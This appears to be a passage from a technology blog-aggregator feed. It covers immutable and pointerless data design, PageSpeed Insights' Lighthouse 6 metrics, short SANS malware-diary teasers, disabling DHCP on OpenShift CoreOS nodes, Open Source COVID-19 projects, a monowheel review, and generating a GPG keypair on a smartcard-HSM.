Instead of thinking of mutable data as the default, I prefer to think of it as data that destroys its own paper trail. It shreds any evidence of the change and adjusts the scene of the crime so the past never happened. All edits are applied atomically, with zero allowances for delay, consideration, error or ambiguity. This transactional view of interacting with data is certainly appealing to systems administrators and high-performance fetishists, but it is a poor match for how people work with data in real life. We enter and update it incrementally, make adjustments and mistakes, and need to keep the drafts safe too. We need to sync between devices and across a night of sleep.

banksy self-shredding painting

Girl With Balloon aka The Self-shredding Painting (Banksy)

Storing your main project in a bunch of silicon that loses its state as soon as you turn off the power is inadvisable. This is why we have automated backups. Apple's Time Machine for instance turns your computer into a semi-immutable data store on a human time scale, garbage collected behind the scenes and after the fact. Past revisions of files are retained for as long as is practical, provided the app supports revision control. It even works without the backup drive actually hooked up, as it maintains a local cache of the most recent edits as space permits.

It's a significant feat of engineering, supported by a clever reinterpretation of what "free disk space" actually means. It allows you to Think Different™ about how data works on your computer. It doesn't just give you the peace of mind of short-term OS-wide undo. It means you can still go fish a crumpled piece of data out of the trash long after throwing banana peels and coke cans on top. And you can do it inline, inside the app you're using, using a UI that is only slightly over the top for what it does.

That is what immutable data gets you as an end-user, and it's the result of deciding not to mutate everything in place as if empty disk space is a precious commodity. The benefits can be enormous, for example that synchronization problems get turned into fetching problems. This is called a Git.

It's so good most developers would riot if they were forced to work without it, but almost none grant their own creations the same abilities.

Linus Torvalds

Git repositories are of course notorious for only growing bigger, never shrinking, but that is a long-standing bug if we're really honest. It seems pretty utopian to want a seamless universe of data, perfectly normalized by key in perpetuity, whether mutable or immutable. Falsehoods programmers believe about X is never wrong on a long enough time-scale, and you will need affordances to cushion that inevitable blow sooner or later.

One of those falsehoods is that when you link a piece of data from somewhere else, you always wish to keep that link live instead of snapshotting it, better known as Database Normalization. Given that screenshots of screenshots are now the most common type of picture on the web, aside from cats, we all know that's a lie. Old bills don't actually self-update after you move house. In fact if you squint hard "Print to PDF" looks a lot like compiling source code into a binary for normies, used for much the same reasons.

The analogy to a piece of paper is poignant to me, because you certainly feel it when you try to actually live off SaaS software meant to replicate business processes. Working with spreadsheets and PDFs on my own desktop is easier and faster than trying to use an average business solution designed for that purpose in the current year. Because they built a tool for what they thought people do, instead of what we actually do.

These apps often have immutability, but they use it wrong: they prevent you from changing something as a matter of policy, letting workflow concerns take precedence over an executive override. If e.g. law requires a paper trail, past versions can be archived. But they should let you continue to edit as much as you damn well want, saving in the background if appropriate. The exceptions that get this right can probably be counted on one hand.

Business processes are meant to enable business, not constrain it. Requiring that you only ever have one version of everything at any time does exactly that. Immutability with history is often a better solution, though not a miracle cure. Doing it well requires expert skill in drawing boundaries between your immutable blobs. It also creates a garbage problem and it won't be as fast as mutable in the short term. But in the long term it just might save someone a rewrite. It's rarely pretty when real world constraints collide with an ivory tower that had too many false assumptions baked into it.

Rolls containing Acts of Parliament in the Parliamentary Archives at Victoria Tower, Palace of Westminster

Parliamentary Archives at Victoria Tower – Palace of Westminster

Pointerless Data

Data structures in a systems language like C will usually refer to each other using memory pointers: these are raw 64-bit addresses pointing into the local machine's memory, obscured by virtualization. They reference memory pages that are allocated, with their specific numeric value meaningless and unpredictable.

This has a curious consequence: the most common form of working with data on a computer is one of the least useful encodings of that data imaginable. It cannot be used as-is on any other machine, or even the same machine later, unless loaded at exactly the same memory offset in the exact same environment.

Almost anything else, even in an obscure format, would have more general utility. Serializing and deserializing binary data is hence a major thing, which includes having to "fix" all the pointers, a problem that has generated at least 573 kiloyaks worth of shaving. This is strange because the solution is literally just adding or subtracting a number from a bunch of other numbers over and over.

Okay that's a lie. But what's true is that every pointer p in a linked data structure is really a base + i, with a base address that was determined once and won't change. Using pointers in your data structure means you sprinkle base + invisibly around your code and your data. You bake this value into countless repeated memory cells, which you then have to subtract later if you want to use their contents for outside purposes.

Due to dynamic memory allocation the base can vary for different parts of your linked data structure. You have to assume it's different per pointer, and manually collate and defragment all the individual parts to serialize something.

Pointers are popular because they are easy, they let you forget where exactly in memory your data sits. This is also their downside: not only have you encoded your data in the least repeatable form possible, but you put it where you don't have permission to search through all of it, add to it, or reorganize it. malloc doesn't set you free, it binds you.

But that's a design choice. If you work inside one contiguous memory space, you can replace pointers with just the relative offset i. The resulting data can be snapshotted as a whole and written to disk. In addition to pointerless, certain data structures can even be made offsetless.

For example, a flattened binary tree where the index of a node in a list determines its position in the tree, row by row. Children are found at 2*i and 2*i + 1. This can be e.g. used on GPUs and allows for very efficient traversal and updates. It's also CPU-cache friendly. This doesn't work well for arbitrary graphs, but is still a useful trick to have in your toolbox. In specific settings, pointerless or offsetless data structures can have significant benefits. The fact that it lets you treat data like data again, and just cargo it around wholesale without concern about the minutiae, enables a bunch of other options around it.

Binary Tree - Flattened
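A minimal sketch of such a flattened tree, using the equivalent 0-based indexing where the children of node i sit at 2*i + 1 and 2*i + 2. Everything is plain array indices, so the whole structure can be written to disk or shipped to a GPU with no pointers to fix up:

```typescript
// Offsetless flattened binary tree: position in the array IS the structure.
//
//            1
//          /   \
//         2     3
//        / \   / \
//       4   5 6   7
const tree = [1, 2, 3, 4, 5, 6, 7];

const left  = (i: number) => 2 * i + 1;
const right = (i: number) => 2 * i + 2;

// In-order traversal using only indices — no dereferencing, cache-friendly.
function inorder(nodes: number[], i = 0, out: number[] = []): number[] {
  if (i >= nodes.length) return out;
  inorder(nodes, left(i), out);
  out.push(nodes[i]);
  inorder(nodes, right(i), out);
  return out;
}

console.assert(inorder(tree).join(",") === "4,2,5,1,6,3,7");
```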

It's not a silver bullet because going pointerless can just shift the problem around in the real world. Your relative offsets can still have the same issue as before, because your actual problem was wrangling the data-graph itself. That is, all the bookkeeping of dependent changes when you edit, delete or reallocate. Unless you can tolerate arbitrary memory fragmentation and bloating, it's going to be a big hassle to make it all work well.

Something else is going on beyond just pointers. See, most data structures aren't really data structures at all. They're acceleration structures for data. They accelerate storage, querying and manipulation of data that was already shaped in a certain way.

The contents of a linked list are the same as that of a linear array, and they serialize to the exact same result. A linked list is just an array that has been atomized, tagged and sprayed across an undefined memory space when it was built or loaded.

Because of performance, we tend to use our acceleration structures as a stand-in for the original data, and manipulate that. But it's important to realize this is programmer laziness: it's only justified if all the code that needs to use that data has the same needs. For example, if one piece of code does insertions, but another needs random access, then neither an array nor a linked list would win, and you need something else.

We can try to come up with ever-cleverer data structures to accommodate every imaginable use, and this is called a Postgres. It leads to a ritual called a Schema Design Meeting where a group of people with differently shaped pegs decide what shape the hole should be. Often you end up with a too-generic model that doesn't hold anything particularly well. All you needed was 1 linked list and 1 array containing the exact same data, and a function to convert one to the other, that you use maybe once or twice.
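The "one linked list, one array, and a converter" idea can be sketched in a few lines — a hypothetical Node type and two helpers, purely to illustrate holding the same data in two shapes:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Node:
    """One cell of a singly linked list: cheap insertion at the head."""
    value: int
    next: Optional["Node"] = None

def to_array(head: Optional[Node]) -> list:
    """Walk the links and flatten into a plain list for random access."""
    out = []
    while head:
        out.append(head.value)
        head = head.next
    return out

def to_linked(values: list) -> Optional[Node]:
    """Build a linked list holding the same values, front to back."""
    head = None
    for v in reversed(values):
        head = Node(v, head)
    return head

print(to_array(to_linked([1, 2, 3])))  # [1, 2, 3]
```

Both forms serialize to the same sequence; the choice between them is purely about which operations you need to accelerate.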

When a developer is having trouble maintaining consistency while coding data manipulations, that's usually because they're actually trying to update something that is both a source of truth and output derived from it, at the same time in the same place. Most of the time this is entirely avoidable. When you do need to do it, it is important to be aware that's what that is.

My advice is to not look for the perfect data structure which kills all birds with one stone, because this is called a Lisp and few people use it. Rather, accept the true meaning of diversity in software: you will have to wrangle different and incompatible approaches, transforming your data depending on context. You will need to rely on well-constructed adaptors that exist to allow one part to forget about most of the rest of the universe. It is best to become good at this and embrace it where you can.

As for handing your data to others, there is already a solution for that. They're called file formats, and they're a thing we used to have. Software used to be able to read many of them, and you could just combine any two tools that had the same ones. Without having to pay a subscription fee for the privilege, or use a bespoke one-time-use convertor. Obviously this was crazy.

These days we prefer to link our data and code using URLs, which is much better because web pages can change invisibly underneath you without any warning. You also can't get the old version back even if you liked it more or really needed it, because browsers have chronic amnesia. Unfortunately it upsets publishers and other copyright holders if anyone tries to change that, so we don't try.

squeak / smalltalk


Suspend and Resume

When you do have snapshottable data structures that can be copied in and out of memory wholesale, it leads to another question: can entire programs be made to work this way? Could they be suspended and resumed mid-operation, even transplanted or copied to another machine? Imagine if instead of a screenshot, a tester could send a process snapshot that can actually be resumed and inspected by a developer. Why did it ever only 'work on my machine'?

Obviously virtual machines exist, and so does wholesale-VM debugging. But on the process level, it's generally a non-starter, because sockets and files and drivers mess it up. External resources won't be tracked while suspended and will likely end up in an invalid state on resume. VMs have well-defined boundaries and well-defined hardware to emulate, whereas operating systems are a complete wild west.

It's worth considering the worth of a paper trail here too. If I suspend a program while a socket is open, and then resume it, what does this actually mean? If it was a one-time request, like an HTTP GET or PUT, I will probably want to retry that request, if at all still relevant. Maybe I prefer to drop it as unimportant and make a newer, different request. If it was an ongoing connection like a WebSocket, I will want to re-establish it. Which is to say, if you told a network layer the reason for opening a socket, maybe it could safely abort and resume sockets for you, subject to one of several policies, and network programming could actually become pleasant.

Files can receive a similar treatment, to deal with the situation where they may have changed, been deleted, moved, etc. Knowing why a file was opened or being written to is required to do this right, and depends on the specific task being accomplished. Here too macOS deserves a shout-out, for being clever enough to realize that if a user moves a file, any application editing that file should switch to the new location as well.

Systems-level programmers tend to orchestrate such things by hand when needed, but the data flow in many cases is quite unidirectional. If a process, or a part of a process, could resume and reconnect with its resources according to prior declared intent, it would make a lot of state machines disappear.

It's not a coincidence this post started with React. Even those aware of it still don't quite realize React is not actually a thing to make web apps. It is an incremental job scheduler, for recursively expanding a tree in an asynchronous and rewindable fashion. It just happens to be built for SGML-like trees, and contains a bunch of legacy fixes for browsers. The pattern can be applied to many areas that are not UI and not web. If it sounds daunting to consider approaching resources this way, consider that people thought exactly the same about async I/O until someone made that pleasant enough.

However, doing this properly will probably require going back further than you think. For example, when you re-establish a socket, should you repeat and confirm the DNS lookup that gave you the IP in the first place? Maybe the user moved locations between suspending and resuming, so you want to reconnect to the nearest data center. Maybe there is no longer a need for the socket because the user went offline.

All of this is contextual, defined by policies informed by the real world. This class of software behavior is properly called etiquette. Like its real world counterpart it is extremely messy because it involves anticipating needs. Usually we only get it approximately right through a series of ad-hoc hacks to patch the worst annoyances. But it is eminently felt when you get such edge cases to work in a generic and reproducible fashion.

Mainly it requires treating policies as first class citizens in your designs and code. This can also lead you to perceive types in code in a different way. A common view is that a type constrains any code that refers to it. That is, types ensure your code only applies valid operations on the represented values. When types represent policies though, the perspective changes because such a type's purpose is not to constrain the code using it. Rather, it provides specific guarantees about the rules of the universe in which that code will be run.

This to me is the key to developer happiness. As opposed to, say, making tools to automate the refactoring of terrible code and make it bearable, but only just.

The key to end-user happiness is to make tools that enable an equivalent level of affordance and flexibility compared to what the developer needed while developing it.

* * *

When you look at code from a data-centric view, a lot of things start to look like stale or inconsistent data problems. I don't like using the word "cache" for this because it focuses on the negative, the absence of fresh input. The real issue is data dependencies, which are connections that must be maintained in order to present a cohesive view and cohesive behavior, derived from a changing input model. Which is still the most practical way of using a computer.

Most caching strategies, including 99% of those in HTTP, are entirely wrong. They fall into the give-up-and-pray category, where they assume the problem is intractable and don't try something that could actually work in all cases. Which, stating the obvious, is what you should actually aim for.

Often the real problem is that the architect's view of the problem is a tangled mess of boxes and arrows that point all over the place, with loopbacks and reversals, which makes it near-impossible to anticipate and cover all the applicable scenarios.

If there is one major thread running through this, it's that many currently accepted sane defaults really shouldn't be. In a world of terabyte laptops and gigabyte GPUs they look suspiciously like premature optimization. Many common assumptions deserve to be re-examined, at least if we want to adapt our tools from the Offline Age to a networked day. We really don't need a glossier version of a Microsoft Office 95 wizard with a less useful file system.

We do need optimized code in our critical paths, but developer time is worth more than CPU time most everywhere else. Most of all, we need the ambition to build complete tools and the humility to grant our users access on an equal footing, instead of hoarding the goods.

The argument against these practices is usually that they lead to bloat and inefficiency. Which is definitely true. Yet even though our industry has not adopted them much at all, the software already comes out orders of magnitude bigger and slower than before. Would it really be worse?

If you tested your blog’s performance on Google PageSpeed Insights yesterday and do so again today, you might be in for a surprise with a lower score even if not one byte (letter) got changed on your site. The reason: Google updated PageSpeed Insights to Lighthouse 6, which changes the KPI’s (the lab data metrics) that are reported, adds new opportunities and recommendations and changes the way the total score is calculated.

So it all starts with the changed KPI’s in the lab metrics; whereas up until yesterday First Contentful Paint, Speed Index, Time to Interactive, First Meaningful Paint, First CPU Idle and First Input Delay were measured, the last three are no longer shown, having been replaced by:

  • Largest Contentful Paint marks the point when the page’s main content has likely loaded; this can generally be improved by removing render-blocking resources (JS/CSS), optimizing images, …
  • Total Blocking Time quantifies how non-interactive a page is while loading; this is mainly impacted by JavaScript (local and 3rd party) blocking the main thread, so improving it generally means ensuring there is less JS to execute
  • Cumulative Layout Shift which measures unexpected layout shifts

The total score is calculated based on all 6 metrics, but the weight of the 3 “old” ones (FCP, SI, TTI) is significantly lowered (from 80 to 45%) and the new LCP & TBT account for a whopping 50% of your score (CLS is only 5%).
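As a rough sketch of that weighting — assuming Lighthouse 6's published per-metric split (FCP 15%, SI 15%, TTI 15%, LCP 25%, TBT 25%, CLS 5%, which adds up to the 45/50/5 breakdown above); the per-metric scores fed in below are made-up inputs, not real measurements:

```python
# Lighthouse 6 per-metric weights (percent); assumed from its published docs.
WEIGHTS = {'FCP': 15, 'SI': 15, 'TTI': 15, 'LCP': 25, 'TBT': 25, 'CLS': 5}

def total_score(metric_scores: dict) -> float:
    """Weighted average of per-metric scores, each already normalized 0-100."""
    return sum(WEIGHTS[m] * s for m, s in metric_scores.items()) / 100

# Made-up example: strong paint scores, weak LCP/TBT drag the total down.
print(total_score({'FCP': 90, 'SI': 80, 'TTI': 70,
                   'LCP': 60, 'TBT': 50, 'CLS': 100}))  # 68.5
```

This makes it easy to see why a heavy-JS site can lose points overnight: LCP and TBT alone now control half the total.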

Lastly, one very interesting opportunity and two recommendations I noticed;

  • GPSI already listed unused CSS, but now adds unused JS to that list, which will prove equally hard to control in WordPress, as JS (like CSS) is added by almost each and every plugin. Obviously if you’re using Autoptimize this will flag the Autoptimized JS; disable Autoptimize for the test by adding ?ao_noptimize=1 to the URL to see what original JS is unused.
  • GPSI now warns about using document.write and about the impact of not using passive event listeners on scrolling performance, which can lead to Google complaining about … Google :-)

Summary: Google Pagespeed Insights changed a lot and it forces performance-aware users to stay on their toes. Especially sites with lots of (3rd party) JavaScript might want to reconsider some of the tools used.

I published the following diary on “Flashback on CVE-2019-19781“:

First of all, did you know that the Flame malware turned 8 years old today! Happy Birthday! The discovery of this famous malware was announced on May 28th, 2012. The malware was used for targeted cyber espionage activities in the Middle East area. This malware was probably developed by a nation-state organization. It infected a limited number of hosts (~1000 computers) making it a targeted attack… [Read more]

[The post [SANS ISC] Flashback on CVE-2019-19781 has been first published on /dev/random]

May 25, 2020

I recently learned that quite a few (old) root certificates are going to expire, and many websites still send those along in the TLS handshake.

May 23, 2020

I published the following diary on “AgentTesla Delivered via a Malicious PowerPoint Add-In“:

Attackers are always trying to find new ways to deliver malicious code to their victims. Microsoft Word and Excel documents can be easily weaponized by adding malicious VBA macros. Today, they are one of the most common techniques to compromise a computer. Especially because Microsoft implemented macros that execute automatically when the document is opened. In Word, the macro must be named AutoOpen(). In Excel, the name must be Workbook_Open(). However, PowerPoint does not support this kind of macro. Really? Not in the same way as Word and Excel do… [Read more]

[The post [SANS ISC] AgentTesla Delivered via a Malicious PowerPoint Add-In has been first published on /dev/random]

May 21, 2020

I published the following diary on “Malware Triage with FLOSS: API Calls Based Behavior“:

Malware triage is a key component of your hunting process. When you collect suspicious files from multiple sources, you need a tool to automatically process them to extract useful information. To achieve this task, I’m using FAME which means “FAME Automates Malware Evaluation”. This framework is very nice due to the architecture based on plugins that you can enable upon your needs. Here is an overview of my configuration… [Read more]

[The post [SANS ISC] Malware Triage with FLOSS: API Calls Based Behavior has been first published on /dev/random]

May 19, 2020

Recently I had to work with one of my colleagues (David) on something that was new to me: OpenShift. I had never really looked at OpenShift but knew the basic concepts, at least on OKD 3.x.

With 4.x, OCP is completely different: instead of deploying a "normal" Linux distro (like CentOS in our case), it now uses RHCOS (so CoreOS) as its foundation. The goal of this blog post is not to dive into all the technical steps required to deploy/bootstrap the OpenShift cluster, but to discuss one particular 'issue' that I found annoying while deploying: how to disable DHCP on the CoreOS-provisioned nodes.

To cut a long story short, you can read the basic steps needed to deploy Openshift on bare-metal in the official doc

Have you read it ? Good, now we can move forward :)

After we had configured our install-config.yaml (with the values we needed) and also generated the manifests with openshift-install create manifests --dir=/path/, we thought it would just be a matter of deploying with the ignition files built by the openshift-install create ignition-configs --dir=/path step (see the above doc for all details).

It's true that we ended up with some ignition files like:

  • bootstrap.ign
  • worker.ign
  • master.ign

Those ignition files are (more or less) like traditional kickstart files that let you automate the RHCOS deployment on bare-metal. The other part is really easy: it's a matter (with ansible in our case) of just configuring the tftp boot argument and calling an ad-hoc task to remotely force a physical reinstall of the machine (through ipmi).

So we first kicked off the bootstrap node (an ephemeral node used as a temporary master, from which the real masters forming the etcd cluster get their initial config), but then we realized that, while RHCOS was installed and responding on the fixed IP we set through pxeboot kernel parameters (and correctly applied after the reboot), each RHCOS node was also trying by default to activate all present NICs on the machine.

That suddenly became "interesting" as we don't fully control the network where those machines are, and each physical node has 4 NICs, all in the same vlan, in which we also have a small dhcp range for other deployments. Do you see the problem with etcd members in the same subnet having multiple IP addresses? Yeah, it wasn't working, as we saw some requests coming from the dhcp interfaces instead of the first properly configured NIC on each system.

The "good" thing is that you can still ssh into each deployed RHCOS node (even if that's not advised) to troubleshoot this. We discovered that RHCOS still uses NetworkManager, but its default behaviour is to enable all NICs with DHCP if nothing else is declared, which is exactly what we need to disable.

After some research and help from Colin Walters, we were pointed to this bug report for CoreOS.

With the traditional "CentOS Linux" sysadmin mindset, I thought: "good, we can just automate with ansible, ssh'ing into each provisioned RHCOS node to disable it", but there had to be a cleverer way to deal with this, as it was also impacting our initial bootstrap and master nodes (so no way to get the cluster up).

That's when we found this: Customizing deployment with Day-0 config; here is a simple example for Chrony.

That's how I understood the concept of MachineConfig and how it's supposed to work for a provisioned cluster, but also for the bootstrap process. So let's use that information to create what we need and start a fresh deploy.

Assuming that we want to create our manifests in:

openshift-install create manifests --dir=/<path>/

And now that we have manifests, let's inject our machine configs. You'll see that because it's YAML all over the place, injecting YAML in YAML would be "interesting", so the concept here is to inject content as a base64-encoded string, everywhere.

Let's suppose that we want the /etc/NetworkManager/conf.d/disabledhcp.conf file to have this content on each provisioned node (master and worker), telling NetworkManager not to default to auto/dhcp:

[main]
no-auto-default=*

Let's first encode it to base64:

cat << EOF | base64
[main]
no-auto-default=*
EOF

Our base64 value is W21haW5dCm5vLWF1dG8tZGVmYXVsdD0qCg==
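As a sanity check, the round-trip can be reproduced in a couple of lines of Python (the file content here is simply what the base64 value above decodes to):

```python
import base64

# NetworkManager drop-in that disables the auto/DHCP default on all NICs.
content = "[main]\nno-auto-default=*\n"

encoded = base64.b64encode(content.encode("utf-8")).decode("ascii")
print(encoded)  # W21haW5dCm5vLWF1dG8tZGVmYXVsdD0qCg==

# Decoding it back yields the original config file verbatim.
assert base64.b64decode(encoded).decode("utf-8") == content
```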

So now that we have the content, let's create the manifests that will create that file automatically at provisioning time:

pushd <path>
# To ensure that provisioned master will try to become master as soon as they are installed
sed -i 's/mastersSchedulable: true/mastersSchedulable: false/g' manifests/cluster-scheduler-02-config.yml

pushd openshift
for variant in master worker; do 
cat << EOF > ./99_openshift-machineconfig_99-${variant}-nm-nodhcp.yaml
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: ${variant}
  name: nm-${variant}-nodhcp
spec:
  config:
    ignition:
      config: {}
      security:
        tls: {}
      timeouts: {}
      version: 2.2.0
    networkd: {}
    passwd: {}
    storage:
      files:
      - contents:
          source: data:text/plain;charset=utf-8;base64,W21haW5dCm5vLWF1dG8tZGVmYXVsdD0qCg==
          verification: {}
        filesystem: root
        mode: 0644
        path: /etc/NetworkManager/conf.d/disabledhcp.conf
  osImageURL: ""
EOF
done
popd
popd


I think this snippet is pretty straightforward, and you can see in the source how we "inject" the content of the file itself (the base64 value we got in the previous step).

Now that we have added our customizations, we can just proceed with the openshift-install create ignition-configs --dir=/<path> command again, retrieve our .ign files, and call ansible again to redeploy the nodes; this time they were deployed correctly, with only the IP coming from the ansible inventory and no other NIC on dhcp.

And now that it works, deploying/adding more worker nodes to the OCP cluster is just a matter of calling ansible, and physical nodes are deployed in a matter of ~5 minutes (as RHCOS just extracts its own archive on disk and reboots).

I don't know if I'll have to take multiple deep dives into OpenShift in the future, but at least I learned multiple things. And yes: you always learn more when you have to deploy something for the first time and it doesn't work straight away... so while you learn the basics from the official doc, you also have to find other resources/docs elsewhere :-)

Hope this can help people in the same situation when having to deploy OpenShift on premises/bare-metal.

May 15, 2020

As someone who has spent his entire career in Open Source, I've been closely following how Open Source is being used to fight the COVID-19 global pandemic.

I recently moderated a panel discussion on how Open Source is being used with regards to the coronavirus crisis. Our panel included: Jim Webber (Chief Scientist at Neo4J), Ali Ghodsi (CEO at Databricks), Dan Eiref (Senior Director of Product management at Markforged) and Debbie Theobald (CEO at Vecna Robotics). Below are some of the key takeaways from our discussion. They show how Open Source is a force for good in these uncertain times.

Open Source enables knowledge sharing

Providing accurate information related to COVID-19 is an essential public service. Neo4J worked with data scientists and researchers to create CovidGraph. It is an Open Source graph database that brings together information on COVID-19 from different sources.

Jim Webber from Neo4J explained, "The power of graph data [distributed via an open source management system] is that it can pull together disparate datasets from medical practitioners, public health officials and other scientific publications into one central view. People can then make connections between all facts. This is useful when looking for future long-term solutions." CovidGraph helped institutions like the Canadian government integrate data from multiple departments and facilities.

Databricks CEO Ali Ghodsi also spoke to his company's efforts to democratize data and artificial intelligence. Their mission is to help data teams solve the world's toughest problems. Databricks created Glow, an Open Source toolkit built on Apache Spark that enables large-scale genomic analysis. Glow helps scientists understand the development and spread of the COVID-19 virus. Databricks made their datasets available for free. Using Glow's machine learning tools, scientists are creating predictive models that track the spread of COVID-19.

Amid the positive progress we're seeing from this open approach to data, some considerations were raised about governments' responsibilities with the data they collect. Maintaining public trust is always a huge concern. Still, as Ali said, "The need for data is paramount. This isn't a matter of using data to sell ads; it's a matter of using data to save lives."

Open Source makes resources accessible on a global scale

It's been amazing to watch how Open Source propels innovation in times of great need. Dan Eiref from 3D printer company Markforged spoke to how his company responded to the call to assist in the pandemic. Markforged Open Sourced the design for face masks and nasal swabs. They also partnered with doctors to create a protective face shield and distributed personal protective equipment (PPE) to more than 500 hospitals.

"Almost immediately we got demand from more than 10,000 users to replicate this design in their own communities, as well as requests to duplicate the mask on non-Markforged printers. We decided to Open Source the print files so anyone could have access to these protections," said Eiref.

The advantage of Open Source is that it can quickly produce and distribute solutions to the people who need them most. Debbie Theobald, CEO of Vecna Robotics, shared how her company helped tackle the shortage of ventilators. Since COVID-19 began, medical manufacturers have struggled to provide enough ventilators, which can cost upwards of $40,000. Vecna Robotics partnered with the Massachusetts Institute of Technology (MIT) to develop an Open Source ventilator design called Ventiv, a low-cost alternative for emergency ventilation. "The rapid response from people to come together and offer solutions demonstrates the altruistic pull of the Open Source model to make a difference," said Theobald.

Of course, there are still challenges for Open Source in the medical field. In the United States, all equipment requires FDA certification. The FDA isn't used to Open Source, and Open Source isn't used to dealing with FDA certification either. Fortunately, the FDA has adjusted its process to help make these designs available more quickly.

Open Source accelerates digital transformations

A major question on everyone's mind was how technology will affect our society post-pandemic. It's already clear that long-term trends like online commerce, video conferencing, streaming services, cloud adoption and even Open Source are all being accelerated as a result of COVID-19. Many organizations need to innovate faster in order to survive. Responding to long-term trends by slowly adjusting traditional offerings is often "too little, too late".

For example, Debbie Theobald of Vecna Robotics brought up how healthcare organizations can see greater success by embracing websites and mobile applications. "These efforts for better, patient-managed experiences that were going to happen eventually are happening right now. We've launched our mobile app and embraced things like online pre-registration. Companies that were relying on in-person interactions are now struggling to catch up. We've seen that technology-driven interactions are a necessity to keeping patient relationships," she said.

At Acquia, we've known for years that offering great digital experiences is a requirement for organizations looking to stay ahead.

In every crisis, Open Source has empowered organizations to do more with less. It's great to see this play out again. Open Source teams have rallied to help and come up with some pretty incredible solutions when times are tough.


So I got my Xiaomi M365 e-scooter a few months ago, and it quickly started to show quite some disadvantages. The most annoying was the weak motor: going up long hills quickly forced me to step off as the e-scooter came to a grinding halt. The autonomy was low, which required a daily charging session of 4 hours. Another issue was the bulky form factor, which made transportation on the train a bit cumbersome. And last but not least: an e-scooter still looks like a child's toy. I know I'm a grown-up child, but that doesn't mean I want to shout it out to everyone.

In the meantime, I encountered some information on monowheels: single-wheeled devices with pedals on the side. It looks quite daunting to ride one, but when I received my Inmotion V10, I was immediately sold. This kind of device is really revolutionary: powerful motor, great range, great looks. It is compact enough to easily take on public transport, and has a maximum speed of 40 km/h.

It did however take me quite a few days to learn to ride this thing: only after a week of daily half-hour exercise sessions did things finally 'click' inside my head, and a week later I found myself confident enough to ride in traffic. A steep learning curve indeed, but if you persist, the reward is immense: riding this thing feels like flying!

I ran into this error when doing a very large MySQL import from a dumpfile.

May 14, 2020

Annoyingly, the date command differs vastly between Linux & BSD systems. Mac, being based on BSD, inherits the BSD version of that date command.

May 11, 2020

Blue hearts

I'm excited to announce that the Drupal Association has reached its 60-day fundraising goal of $500,000. We also reached it in record time; in just over 30 days instead of the planned 60!

It has been really inspiring to see how the community rallied to help. With this behind us, we can look forward to the planned launch of Drupal 9 on June 3rd and our first virtual DrupalCon in July.

I'd like to thank all of the individuals and organizations who contributed to the #DrupalCares fundraising campaign. The Drupal community is stronger than ever! Thank you!

May 10, 2020

In a few hours, the Bitcoin network will experience its third “halving”. So what is it and how does it work under the hood?
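The schedule behind a halving is simple arithmetic: the block subsidy started at 50 BTC and halves every 210,000 blocks. A minimal sketch:

```python
def block_subsidy(height: int) -> float:
    """Bitcoin block subsidy in BTC: starts at 50, halves every 210,000 blocks."""
    return 50.0 / (2 ** (height // 210_000))

print(block_subsidy(629_999))  # 12.5 — the last block before the third halving
print(block_subsidy(630_000))  # 6.25 — the first block after it
```

The third halving occurs at block 630,000, cutting the per-block reward from 12.5 to 6.25 BTC.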

May 08, 2020

I published the following diary on “Using Nmap As a Lightweight Vulnerability Scanner“:

Yesterday, Bojan wrote a nice diary about the power of the Nmap scripting language (based on Lua). The well-known port scanner can be extended with plenty of scripts that are launched depending on the detected ports. When I read Bojan’s diary, it reminded me of an old article that I wrote on my blog a long time ago. The idea was to use Nmap as a lightweight vulnerability scanner. Nmap has a scan type that tries to determine the service/version information running behind an open port (enabled with the ‘-sV’ flag). Based on this information, the script looks for interesting CVEs in a flat database. Unfortunately, the script was developed by a third-party developer and was never integrated into the official list of scripts… [Read more]

[The post [SANS ISC] Using Nmap As a Lightweight Vulnerability Scanner has been first published on /dev/random]

May 06, 2020

I published the following diary on “Keeping an Eye on Malicious Files Life Time“:

We know that today’s malware campaigns are based on fresh files. Each piece of malware has a unique hash and it makes the detection based on lists of hashes not very useful these days. But can we spot some malicious files coming on stage regularly or, suddenly, just popping up from nowhere… [Read more]

[The post [SANS ISC] Keeping an Eye on Malicious Files Life Time has been first published on /dev/random]

May 05, 2020

These instructions can be followed to create a 2-out-of-3 multisignature address on the EOS blockchain (or any derivative thereof).

May 03, 2020

A quick reminder to myself that the Developer Console in Chrome or Firefox is useful to mass-select a bunch of checkboxes, if the site doesn’t have a “select all” option (which really, it should).

I had a use case where I wanted to be notified whenever a particular string occurred in a log file.

May 02, 2020


When you want to store your GnuPG private key(s) on a smartcard, you have a few options like the Yubikey, GPG-compatible NitroKey cards, or the OpenPGP card. The advantage of these cards is that they support GnuPG directly. The disadvantage is that they can only store one or a few keys.

Another option is SmartCard-HSM; the NitroKey HSM is based on SmartCard-HSM and should be compatible. The newer versions support 4k RSA encryption keys and can store up to 19 RSA 4k keys. The older version is limited to 2k RSA keys; I still have the older version. The advantage is that you can store multiple keys on the card. To use it for GPG encryption you’ll need to set up a gpg-agent with gnupg-pkcs11-scd.



I use 3 smartcards to store my keys; these SmartCard-HSMs were created with Device Key Encryption Key (DKEK) keys. See my previous blog posts on how to set up SmartCard-HSM with Device Key Encryption Keys:

I create the public/private key pair on an air-gapped system running Kali Linux live and copy the key to the other smartcards. See my previous blog posts on how to do this; I’ll only show how to create the keypair in this blog post.

Setup gpg

Create the keypair.

kali@kali:~$ pkcs11-tool --module --keypairgen --key-type rsa:2048 --label gpg.intern.stafnet.local --login
Using slot 0 with a present token (0x0)
Key pair generated:
Private Key Object; RSA 
  label:      gpg.intern.stafnet.local
  ID:         47490caa5589d5b95e2067c5bc49b03711b854da
  Usage:      decrypt, sign, unwrap
  Access:     none
Public Key Object; RSA 2048 bits
  label:      gpg.intern.stafnet.local
  ID:         47490caa5589d5b95e2067c5bc49b03711b854da
  Usage:      encrypt, verify, wrap
  Access:     none

Create and upload the certificate

Create a self-signed certificate

Create a self-signed certificate based on the key pair.

$ openssl req -x509 -engine pkcs11 -keyform engine -new -key 47490caa5589d5b95e2067c5bc49b03711b854da -sha256 -out cert.pem -subj "/CN=gpg.intern.stafnet.local"

Convert to DER

The certificate is created in the PEM format; to be able to upload it to the smartcard, we need it in the DER format (we could have created the certificate directly in DER format with -outform der).

$ openssl x509 -outform der -in cert.pem -out cert.der
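As a sanity check, the DER file can be parsed back and its subject compared with the original. The sketch below rehearses the whole round trip in software (throwaway key, no smartcard involved); the /tmp/demo.* file names are illustrative.

```shell
# Software-only sketch: generate a throwaway key, self-sign a certificate,
# convert it to DER, and read the subject back from the DER file.
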